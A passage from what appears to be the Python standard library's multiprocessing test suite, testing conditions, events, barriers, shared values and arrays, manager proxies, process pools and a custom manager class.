@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor_timeout(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', 0)
success = self.Value('i', False)
sem = self.Semaphore(0)
p = self.Process(target=self._test_waitfor_timeout_f,
args=(cond, state, success, sem))
p.daemon = True
p.start()
self.assertTrue(sem.acquire(timeout=TIMEOUT))
# Only increment 3 times, so state == 4 is never reached.
for i in range(3):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertTrue(success.value)
@classmethod
def _test_wait_result(cls, c, pid):
with c:
c.notify()
time.sleep(1)
if pid is not None:
os.kill(pid, signal.SIGINT)
def test_wait_result(self):
if isinstance(self, ProcessesMixin) and sys.platform != 'win32':
pid = os.getpid()
else:
pid = None
c = self.Condition()
with c:
self.assertFalse(c.wait(0))
self.assertFalse(c.wait(0.1))
p = self.Process(target=self._test_wait_result, args=(c, pid))
p.start()
self.assertTrue(c.wait(60))
if pid is not None:
self.assertRaises(KeyboardInterrupt, c.wait, 60)
p.join()
class _TestEvent(BaseTestCase):
@classmethod
def _test_event(cls, event):
time.sleep(TIMEOUT2)
event.set()
def test_event(self):
event = self.Event()
wait = TimingWrapper(event.wait)
# Removed temporarily, due to API shear, this does not
# work with threading._Event objects. is_set == isSet
self.assertEqual(event.is_set(), False)
# Removed, threading.Event.wait() will return the value of the __flag
# instead of None. API Shear with the semaphore backed mp.Event
self.assertEqual(wait(0.0), False)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
event.set()
# See note above on the API differences
self.assertEqual(event.is_set(), True)
self.assertEqual(wait(), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
# self.assertEqual(event.is_set(), True)
event.clear()
#self.assertEqual(event.is_set(), False)
p = self.Process(target=self._test_event, args=(event,))
p.daemon = True
p.start()
self.assertEqual(wait(), True)
p.join()
#
# Tests for Barrier - adapted from tests in test/lock_tests.py
#
# Many of the tests for threading.Barrier use a list as an atomic
# counter: a value is appended to increment the counter, and the
# length of the list gives the value. We use the class DummyList
# for the same purpose.
class _DummyList(object):
def __init__(self):
wrapper = multiprocessing.heap.BufferWrapper(struct.calcsize('i'))
lock = multiprocessing.Lock()
self.__setstate__((wrapper, lock))
self._lengthbuf[0] = 0
def __setstate__(self, state):
(self._wrapper, self._lock) = state
self._lengthbuf = self._wrapper.create_memoryview().cast('i')
def __getstate__(self):
return (self._wrapper, self._lock)
def append(self, _):
with self._lock:
self._lengthbuf[0] += 1
def __len__(self):
with self._lock:
return self._lengthbuf[0]
def _wait():
# A crude wait/yield function not relying on synchronization primitives.
time.sleep(0.01)
class Bunch(object):
"""
A bunch of threads.
"""
def __init__(self, namespace, f, args, n, wait_before_exit=False):
"""
Construct a bunch of `n` threads running the same function `f`.
If `wait_before_exit` is True, the threads won't terminate until
do_finish() is called.
"""
self.f = f
self.args = args
self.n = n
self.started = namespace.DummyList()
self.finished = namespace.DummyList()
self._can_exit = namespace.Event()
if not wait_before_exit:
self._can_exit.set()
threads = []
for i in range(n):
p = namespace.Process(target=self.task)
p.daemon = True
p.start()
threads.append(p)
def finalize(threads):
for p in threads:
p.join()
self._finalizer = weakref.finalize(self, finalize, threads)
def task(self):
pid = os.getpid()
self.started.append(pid)
try:
self.f(*self.args)
finally:
self.finished.append(pid)
self._can_exit.wait(30)
assert self._can_exit.is_set()
def wait_for_started(self):
while len(self.started) < self.n:
_wait()
def wait_for_finished(self):
while len(self.finished) < self.n:
_wait()
def do_finish(self):
self._can_exit.set()
def close(self):
self._finalizer()
class AppendTrue(object):
def __init__(self, obj):
self.obj = obj
def __call__(self):
self.obj.append(True)
class _TestBarrier(BaseTestCase):
"""
Tests for Barrier objects.
"""
N = 5
defaultTimeout = 30.0 # XXX Slow Windows buildbots need generous timeout
def setUp(self):
self.barrier = self.Barrier(self.N, timeout=self.defaultTimeout)
def tearDown(self):
self.barrier.abort()
self.barrier = None
def DummyList(self):
if self.TYPE == 'threads':
return []
elif self.TYPE == 'manager':
return self.manager.list()
else:
return _DummyList()
def run_threads(self, f, args):
b = Bunch(self, f, args, self.N-1)
try:
f(*args)
b.wait_for_finished()
finally:
b.close()
@classmethod
def multipass(cls, barrier, results, n):
m = barrier.parties
assert m == cls.N
for i in range(n):
results[0].append(True)
assert len(results[1]) == i * m
barrier.wait()
results[1].append(True)
assert len(results[0]) == (i + 1) * m
barrier.wait()
try:
assert barrier.n_waiting == 0
except NotImplementedError:
pass
assert not barrier.broken
def test_barrier(self, passes=1):
"""
Test that a barrier is passed in lockstep
"""
results = [self.DummyList(), self.DummyList()]
self.run_threads(self.multipass, (self.barrier, results, passes))
def test_barrier_10(self):
"""
Test that a barrier works for 10 consecutive runs
"""
return self.test_barrier(10)
@classmethod
def _test_wait_return_f(cls, barrier, queue):
res = barrier.wait()
queue.put(res)
def test_wait_return(self):
"""
test the return value from barrier.wait
"""
queue = self.Queue()
self.run_threads(self._test_wait_return_f, (self.barrier, queue))
results = [queue.get() for i in range(self.N)]
self.assertEqual(results.count(0), 1)
close_queue(queue)
@classmethod
def _test_action_f(cls, barrier, results):
barrier.wait()
if len(results) != 1:
raise RuntimeError
def test_action(self):
"""
Test the 'action' callback
"""
results = self.DummyList()
barrier = self.Barrier(self.N, action=AppendTrue(results))
self.run_threads(self._test_action_f, (barrier, results))
self.assertEqual(len(results), 1)
@classmethod
def _test_abort_f(cls, barrier, results1, results2):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
def test_abort(self):
"""
Test that an abort will put the barrier in a broken state
"""
results1 = self.DummyList()
results2 = self.DummyList()
self.run_threads(self._test_abort_f,
(self.barrier, results1, results2))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertTrue(self.barrier.broken)
@classmethod
def _test_reset_f(cls, barrier, results1, results2, results3):
i = barrier.wait()
if i == cls.N//2:
# Wait until the other threads are all in the barrier.
while barrier.n_waiting < cls.N-1:
time.sleep(0.001)
barrier.reset()
else:
try:
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
# Now, pass the barrier again
barrier.wait()
results3.append(True)
def test_reset(self):
"""
Test that a 'reset' on a barrier frees the waiting threads
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
self.run_threads(self._test_reset_f,
(self.barrier, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_abort_and_reset_f(cls, barrier, barrier2,
results1, results2, results3):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
# Synchronize and reset the barrier. Must synchronize first so
# that everyone has left it when we reset, and after so that no
# one enters it before the reset.
if barrier2.wait() == cls.N//2:
barrier.reset()
barrier2.wait()
barrier.wait()
results3.append(True)
def test_abort_and_reset(self):
"""
Test that a barrier can be reset after being broken.
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
barrier2 = self.Barrier(self.N)
self.run_threads(self._test_abort_and_reset_f,
(self.barrier, barrier2, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_timeout_f(cls, barrier, results):
i = barrier.wait()
if i == cls.N//2:
# One thread is late!
time.sleep(1.0)
try:
barrier.wait(0.5)
except threading.BrokenBarrierError:
results.append(True)
def test_timeout(self):
"""
Test wait(timeout)
"""
results = self.DummyList()
self.run_threads(self._test_timeout_f, (self.barrier, results))
self.assertEqual(len(results), self.barrier.parties)
@classmethod
def _test_default_timeout_f(cls, barrier, results):
i = barrier.wait(cls.defaultTimeout)
if i == cls.N//2:
# One thread is later than the default timeout
time.sleep(1.0)
try:
barrier.wait()
except threading.BrokenBarrierError:
results.append(True)
def test_default_timeout(self):
"""
Test the barrier's default timeout
"""
barrier = self.Barrier(self.N, timeout=0.5)
results = self.DummyList()
self.run_threads(self._test_default_timeout_f, (barrier, results))
self.assertEqual(len(results), barrier.parties)
def test_single_thread(self):
b = self.Barrier(1)
b.wait()
b.wait()
@classmethod
def _test_thousand_f(cls, barrier, passes, conn, lock):
for i in range(passes):
barrier.wait()
with lock:
conn.send(i)
def test_thousand(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
passes = 1000
lock = self.Lock()
conn, child_conn = self.Pipe(False)
for j in range(self.N):
p = self.Process(target=self._test_thousand_f,
args=(self.barrier, passes, child_conn, lock))
p.start()
self.addCleanup(p.join)
for i in range(passes):
for j in range(self.N):
self.assertEqual(conn.recv(), i)
#
#
#
class _TestValue(BaseTestCase):
ALLOWED_TYPES = ('processes',)
codes_values = [
('i', 4343, 24234),
('d', 3.625, -4.25),
('h', -232, 234),
('q', 2 ** 33, 2 ** 34),
('c', latin('x'), latin('y'))
]
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _test(cls, values):
for sv, cv in zip(values, cls.codes_values):
sv.value = cv[2]
def test_value(self, raw=False):
if raw:
values = [self.RawValue(code, value)
for code, value, _ in self.codes_values]
else:
values = [self.Value(code, value)
for code, value, _ in self.codes_values]
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[1])
proc = self.Process(target=self._test, args=(values,))
proc.daemon = True
proc.start()
proc.join()
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[2])
def test_rawvalue(self):
self.test_value(raw=True)
def test_getobj_getlock(self):
val1 = self.Value('i', 5)
lock1 = val1.get_lock()
obj1 = val1.get_obj()
val2 = self.Value('i', 5, lock=None)
lock2 = val2.get_lock()
obj2 = val2.get_obj()
lock = self.Lock()
val3 = self.Value('i', 5, lock=lock)
lock3 = val3.get_lock()
obj3 = val3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Value('i', 5, lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError, self.Value, 'i', 5, lock='navalue')
arr5 = self.RawValue('i', 5)
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
class _TestArray(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def f(cls, seq):
for i in range(1, len(seq)):
seq[i] += seq[i-1]
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array(self, raw=False):
seq = [680, 626, 934, 821, 150, 233, 548, 982, 714, 831]
if raw:
arr = self.RawArray('i', seq)
else:
arr = self.Array('i', seq)
self.assertEqual(len(arr), len(seq))
self.assertEqual(arr[3], seq[3])
self.assertEqual(list(arr[2:7]), list(seq[2:7]))
arr[4:8] = seq[4:8] = array.array('i', [1, 2, 3, 4])
self.assertEqual(list(arr[:]), seq)
self.f(seq)
p = self.Process(target=self.f, args=(arr,))
p.daemon = True
p.start()
p.join()
self.assertEqual(list(arr[:]), seq)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array_from_size(self):
size = 10
# Test for zeroing (see issue #11675).
# The repetition below strengthens the test by increasing the chances
# of previously allocated non-zero memory being used for the new array
# on the 2nd and 3rd loops.
for _ in range(3):
arr = self.Array('i', size)
self.assertEqual(len(arr), size)
self.assertEqual(list(arr), [0] * size)
arr[:] = range(10)
self.assertEqual(list(arr), list(range(10)))
del arr
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_rawarray(self):
self.test_array(raw=True)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_getobj_getlock_obj(self):
arr1 = self.Array('i', list(range(10)))
lock1 = arr1.get_lock()
obj1 = arr1.get_obj()
arr2 = self.Array('i', list(range(10)), lock=None)
lock2 = arr2.get_lock()
obj2 = arr2.get_obj()
lock = self.Lock()
arr3 = self.Array('i', list(range(10)), lock=lock)
lock3 = arr3.get_lock()
obj3 = arr3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Array('i', range(10), lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError,
self.Array, 'i', range(10), lock='notalock')
arr5 = self.RawArray('i', range(10))
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
#
#
#
class _TestContainers(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_list(self):
a = self.list(list(range(10)))
self.assertEqual(a[:], list(range(10)))
b = self.list()
self.assertEqual(b[:], [])
b.extend(list(range(5)))
self.assertEqual(b[:], list(range(5)))
self.assertEqual(b[2], 2)
self.assertEqual(b[2:10], [2,3,4])
b *= 2
self.assertEqual(b[:], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4])
self.assertEqual(b + [5, 6], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 5, 6])
self.assertEqual(a[:], list(range(10)))
d = [a, b]
e = self.list(d)
self.assertEqual(
[element[:] for element in e],
[[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4]]
)
f = self.list([a])
a.append('hello')
self.assertEqual(f[0][:], [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 'hello'])
def test_list_iter(self):
a = self.list(list(range(10)))
it = iter(a)
self.assertEqual(list(it), list(range(10)))
self.assertEqual(list(it), []) # exhausted
# list modified during iteration
it = iter(a)
a[0] = 100
self.assertEqual(next(it), 100)
def test_list_proxy_in_list(self):
a = self.list([self.list(range(3)) for _i in range(3)])
self.assertEqual([inner[:] for inner in a], [[0, 1, 2]] * 3)
a[0][-1] = 55
self.assertEqual(a[0][:], [0, 1, 55])
for i in range(1, 3):
self.assertEqual(a[i][:], [0, 1, 2])
self.assertEqual(a[1].pop(), 2)
self.assertEqual(len(a[1]), 2)
for i in range(0, 3, 2):
self.assertEqual(len(a[i]), 3)
del a
b = self.list()
b.append(b)
del b
def test_dict(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
self.assertEqual(d.copy(), dict((i, chr(i)) for i in indices))
self.assertEqual(sorted(d.keys()), indices)
self.assertEqual(sorted(d.values()), [chr(i) for i in indices])
self.assertEqual(sorted(d.items()), [(i, chr(i)) for i in indices])
def test_dict_iter(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
it = iter(d)
self.assertEqual(list(it), indices)
self.assertEqual(list(it), []) # exhausted
# dictionary changed size during iteration
it = iter(d)
d.clear()
self.assertRaises(RuntimeError, next, it)
def test_dict_proxy_nested(self):
pets = self.dict(ferrets=2, hamsters=4)
supplies = self.dict(water=10, feed=3)
d = self.dict(pets=pets, supplies=supplies)
self.assertEqual(supplies['water'], 10)
self.assertEqual(d['supplies']['water'], 10)
d['supplies']['blankets'] = 5
self.assertEqual(supplies['blankets'], 5)
self.assertEqual(d['supplies']['blankets'], 5)
d['supplies']['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
del pets
del supplies
self.assertEqual(d['pets']['ferrets'], 2)
d['supplies']['blankets'] = 11
self.assertEqual(d['supplies']['blankets'], 11)
pets = d['pets']
supplies = d['supplies']
supplies['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
d.clear()
self.assertEqual(len(d), 0)
self.assertEqual(supplies['water'], 7)
self.assertEqual(pets['hamsters'], 4)
l = self.list([pets, supplies])
l[0]['marmots'] = 1
self.assertEqual(pets['marmots'], 1)
self.assertEqual(l[0]['marmots'], 1)
del pets
del supplies
self.assertEqual(l[0]['marmots'], 1)
outer = self.list([[88, 99], l])
self.assertIsInstance(outer[0], list) # Not a ListProxy
self.assertEqual(outer[-1][-1]['feed'], 3)
def test_namespace(self):
n = self.Namespace()
n.name = 'Bob'
n.job = 'Builder'
n._hidden = 'hidden'
self.assertEqual((n.name, n.job), ('Bob', 'Builder'))
del n.job
self.assertEqual(str(n), "Namespace(name='Bob')")
self.assertTrue(hasattr(n, 'name'))
self.assertTrue(not hasattr(n, 'job'))
#
#
#
def sqr(x, wait=0.0):
time.sleep(wait)
return x*x
def mul(x, y):
return x*y
def raise_large_valuerror(wait):
time.sleep(wait)
raise ValueError("x" * 1024**2)
def identity(x):
return x
class CountedObject(object):
n_instances = 0
def __new__(cls):
cls.n_instances += 1
return object.__new__(cls)
def __del__(self):
type(self).n_instances -= 1
class SayWhenError(ValueError): pass
def exception_throwing_generator(total, when):
if when == -1:
raise SayWhenError("Somebody said when")
for i in range(total):
if i == when:
raise SayWhenError("Somebody said when")
yield i
class _TestPool(BaseTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.pool = cls.Pool(4)
@classmethod
def tearDownClass(cls):
cls.pool.terminate()
cls.pool.join()
cls.pool = None
super().tearDownClass()
def test_apply(self):
papply = self.pool.apply
self.assertEqual(papply(sqr, (5,)), sqr(5))
self.assertEqual(papply(sqr, (), {'x':3}), sqr(x=3))
def test_map(self):
pmap = self.pool.map
self.assertEqual(pmap(sqr, list(range(10))), list(map(sqr, list(range(10)))))
self.assertEqual(pmap(sqr, list(range(100)), chunksize=20),
list(map(sqr, list(range(100)))))
def test_starmap(self):
psmap = self.pool.starmap
tuples = list(zip(range(10), range(9,-1, -1)))
self.assertEqual(psmap(mul, tuples),
list(itertools.starmap(mul, tuples)))
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(psmap(mul, tuples, chunksize=20),
list(itertools.starmap(mul, tuples)))
def test_starmap_async(self):
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(self.pool.starmap_async(mul, tuples).get(),
list(itertools.starmap(mul, tuples)))
def test_map_async(self):
self.assertEqual(self.pool.map_async(sqr, list(range(10))).get(),
list(map(sqr, list(range(10)))))
def test_map_async_callbacks(self):
call_args = self.manager.list() if self.TYPE == 'manager' else []
self.pool.map_async(int, ['1'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(1, len(call_args))
self.assertEqual([1], call_args[0])
self.pool.map_async(int, ['a'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(2, len(call_args))
self.assertIsInstance(call_args[1], ValueError)
def test_map_unplicklable(self):
# Issue #19425 -- failure to pickle should not cause a hang
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class A(object):
def __reduce__(self):
raise RuntimeError('cannot pickle')
with self.assertRaises(RuntimeError):
self.pool.map(sqr, [A()]*10)
def test_map_chunksize(self):
try:
self.pool.map_async(sqr, [], chunksize=1).get(timeout=TIMEOUT1)
except multiprocessing.TimeoutError:
self.fail("pool.map_async with chunksize stalled on null list")
def test_map_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
# again, make sure it's reentrant
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(10, 3), 1)
class SpecialIterable:
def __iter__(self):
return self
def __next__(self):
raise SayWhenError
def __len__(self):
return 1
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
def test_async(self):
res = self.pool.apply_async(sqr, (7, TIMEOUT1,))
get = TimingWrapper(res.get)
self.assertEqual(get(), 49)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
def test_async_timeout(self):
res = self.pool.apply_async(sqr, (6, TIMEOUT2 + 1.0))
get = TimingWrapper(res.get)
self.assertRaises(multiprocessing.TimeoutError, get, timeout=TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT2)
def test_imap(self):
it = self.pool.imap(sqr, list(range(10)))
self.assertEqual(list(it), list(map(sqr, list(range(10)))))
it = self.pool.imap(sqr, list(range(10)))
for i in range(10):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
it = self.pool.imap(sqr, list(range(1000)), chunksize=100)
for i in range(1000):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
def test_imap_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(10, 3), 1)
for i in range(3):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
# SayWhenError seen at start of problematic chunk's results
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 2)
for i in range(6):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 4)
for i in range(4):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
def test_imap_unordered(self):
it = self.pool.imap_unordered(sqr, list(range(10)))
self.assertEqual(sorted(it), list(map(sqr, list(range(10)))))
it = self.pool.imap_unordered(sqr, list(range(1000)), chunksize=100)
self.assertEqual(sorted(it), list(map(sqr, list(range(1000)))))
def test_imap_unordered_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(10, 3),
1)
expected_values = list(map(sqr, list(range(10))))
with self.assertRaises(SayWhenError):
# imap_unordered makes it difficult to anticipate the SayWhenError
for i in range(10):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(20, 7),
2)
expected_values = list(map(sqr, list(range(20))))
with self.assertRaises(SayWhenError):
for i in range(20):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
def test_make_pool(self):
expected_error = (RemoteError if self.TYPE == 'manager'
else ValueError)
self.assertRaises(expected_error, self.Pool, -1)
self.assertRaises(expected_error, self.Pool, 0)
if self.TYPE != 'manager':
p = self.Pool(3)
try:
self.assertEqual(3, len(p._pool))
finally:
p.close()
p.join()
def test_terminate(self):
result = self.pool.map_async(
time.sleep, [0.1 for i in range(10000)], chunksize=1
)
self.pool.terminate()
join = TimingWrapper(self.pool.join)
join()
# Sanity check the pool didn't wait for all tasks to finish
self.assertLess(join.elapsed, 2.0)
def test_empty_iterable(self):
# See Issue 12157
p = self.Pool(1)
self.assertEqual(p.map(sqr, []), [])
self.assertEqual(list(p.imap(sqr, [])), [])
self.assertEqual(list(p.imap_unordered(sqr, [])), [])
self.assertEqual(p.map_async(sqr, []).get(), [])
p.close()
p.join()
def test_context(self):
if self.TYPE == 'processes':
L = list(range(10))
expected = [sqr(i) for i in L]
with self.Pool(2) as p:
r = p.map_async(sqr, L)
self.assertEqual(r.get(), expected)
p.join()
self.assertRaises(ValueError, p.map_async, sqr, L)
@classmethod
def _test_traceback(cls):
raise RuntimeError(123) # some comment
def test_traceback(self):
# We want ensure that the traceback from the child process is
# contained in the traceback raised in the main process.
if self.TYPE == 'processes':
with self.Pool(1) as p:
try:
p.apply(self._test_traceback)
except Exception as e:
exc = e
else:
self.fail('expected RuntimeError')
p.join()
self.assertIs(type(exc), RuntimeError)
self.assertEqual(exc.args, (123,))
cause = exc.__cause__
self.assertIs(type(cause), multiprocessing.pool.RemoteTraceback)
self.assertIn('raise RuntimeError(123) # some comment', cause.tb)
with test.support.captured_stderr() as f1:
try:
raise exc
except RuntimeError:
sys.excepthook(*sys.exc_info())
self.assertIn('raise RuntimeError(123) # some comment',
f1.getvalue())
# _helper_reraises_exception should not make the error
# a remote exception
with self.Pool(1) as p:
try:
p.map(sqr, exception_throwing_generator(1, -1), 1)
except Exception as e:
exc = e
else:
self.fail('expected SayWhenError')
self.assertIs(type(exc), SayWhenError)
self.assertIs(exc.__cause__, None)
p.join()
@classmethod
def _test_wrapped_exception(cls):
raise RuntimeError('foo')
def test_wrapped_exception(self):
# Issue #20980: Should not wrap exception when using thread pool
with self.Pool(1) as p:
with self.assertRaises(RuntimeError):
p.apply(self._test_wrapped_exception)
p.join()
def test_map_no_failfast(self):
# Issue #23992: the fail-fast behaviour when an exception is raised
# during map() would make Pool.join() deadlock, because a worker
# process would fill the result queue (after the result handler thread
# terminated, hence not draining it anymore).
t_start = time.monotonic()
with self.assertRaises(ValueError):
with self.Pool(2) as p:
try:
p.map(raise_large_valuerror, [0, 1])
finally:
time.sleep(0.5)
p.close()
p.join()
# check that we indeed waited for all jobs
self.assertGreater(time.monotonic() - t_start, 0.9)
def test_release_task_refs(self):
# Issue #29861: task arguments and results should not be kept
# alive after we are done with them.
objs = [CountedObject() for i in range(10)]
refs = [weakref.ref(o) for o in objs]
self.pool.map(identity, objs)
del objs
time.sleep(DELTA) # let threaded cleanup code run
self.assertEqual(set(wr() for wr in refs), {None})
# With a process pool, copies of the objects are returned, check
# they were released too.
self.assertEqual(CountedObject.n_instances, 0)
def raising():
raise KeyError("key")
def unpickleable_result():
return lambda: 42
class _TestPoolWorkerErrors(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_async_error_callback(self):
p = multiprocessing.Pool(2)
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(raising, error_callback=errback)
self.assertRaises(KeyError, res.get)
self.assertTrue(scratchpad[0])
self.assertIsInstance(scratchpad[0], KeyError)
p.close()
p.join()
def test_unpickleable_result(self):
from multiprocessing.pool import MaybeEncodingError
p = multiprocessing.Pool(2)
# Make sure we don't lose pool processes because of encoding errors.
for iteration in range(20):
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(unpickleable_result, error_callback=errback)
self.assertRaises(MaybeEncodingError, res.get)
wrapped = scratchpad[0]
self.assertTrue(wrapped)
self.assertIsInstance(scratchpad[0], MaybeEncodingError)
self.assertIsNotNone(wrapped.exc)
self.assertIsNotNone(wrapped.value)
p.close()
p.join()
class _TestPoolWorkerLifetime(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_pool_worker_lifetime(self):
p = multiprocessing.Pool(3, maxtasksperchild=10)
self.assertEqual(3, len(p._pool))
origworkerpids = [w.pid for w in p._pool]
# Run many tasks so each worker gets replaced (hopefully)
results = []
for i in range(100):
results.append(p.apply_async(sqr, (i, )))
# Fetch the results and verify we got the right answers,
# also ensuring all the tasks have completed.
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
# Refill the pool
p._repopulate_pool()
# Wait until all workers are alive
# (countdown * DELTA = 5 seconds max startup process time)
countdown = 50
while countdown and not all(w.is_alive() for w in p._pool):
countdown -= 1
time.sleep(DELTA)
finalworkerpids = [w.pid for w in p._pool]
# All pids should be assigned. See issue #7805.
self.assertNotIn(None, origworkerpids)
self.assertNotIn(None, finalworkerpids)
# Finally, check that the worker pids have changed
self.assertNotEqual(sorted(origworkerpids), sorted(finalworkerpids))
p.close()
p.join()
def test_pool_worker_lifetime_early_close(self):
# Issue #10332: closing a pool whose workers have limited lifetimes
# before all the tasks completed would make join() hang.
p = multiprocessing.Pool(3, maxtasksperchild=1)
results = []
for i in range(6):
results.append(p.apply_async(sqr, (i, 0.3)))
p.close()
p.join()
# check the results
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
#
# Test of creating a customized manager class
#
from multiprocessing.managers import BaseManager, BaseProxy, RemoteError
class FooBar(object):
def f(self):
return 'f()'
def g(self):
raise ValueError
def _h(self):
return '_h()'
def baz():
for i in range(10):
yield i*i
class IteratorProxy(BaseProxy):
_exposed_ = ('__next__',)
def __iter__(self):
return self
def __next__(self):
return self._callmethod('__next__')
class MyManager(BaseManager):
pass
MyManager.register('Foo', callable=FooBar)
MyManager.register('Bar', callable=FooBar, exposed=('f', '_h'))
MyManager.register('baz', callable=baz, proxytype=IteratorProxy)
class _TestMyManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_mymanager(self):
manager = MyManager()
manager.start()
self.common(manager)
manager.shutdown()
# bpo-30356: BaseManager._finalize_manager() sends SIGTERM
# to the manager process if it takes longer than 1 second to stop,
# which happens on slow buildbots.
self.assertIn(manager._process.exitcode, (0, -signal.SIGTERM))
def test_mymanager_context(self):
with MyManager() as manager:
self.common(manager)
# bpo-30356: BaseManager._finalize_manager() sends SIGTERM
# to the manager process if it takes longer than 1 second to stop,
# which happens on slow buildbots.
self.assertIn(manager._process.exitcode, (0, -signal.SIGTERM))
def test_mymanager_context_prestarted(self):
manager = MyManager()
manager.start()
with manager:
self.common(manager)
self.assertEqual(manager._process.exitcode, 0)
def common(self, manager):
foo = manager.Foo()
bar = manager.Bar()
baz = manager.baz()
foo_methods = [name for name in ('f', 'g', '_h') if hasattr(foo, name)]
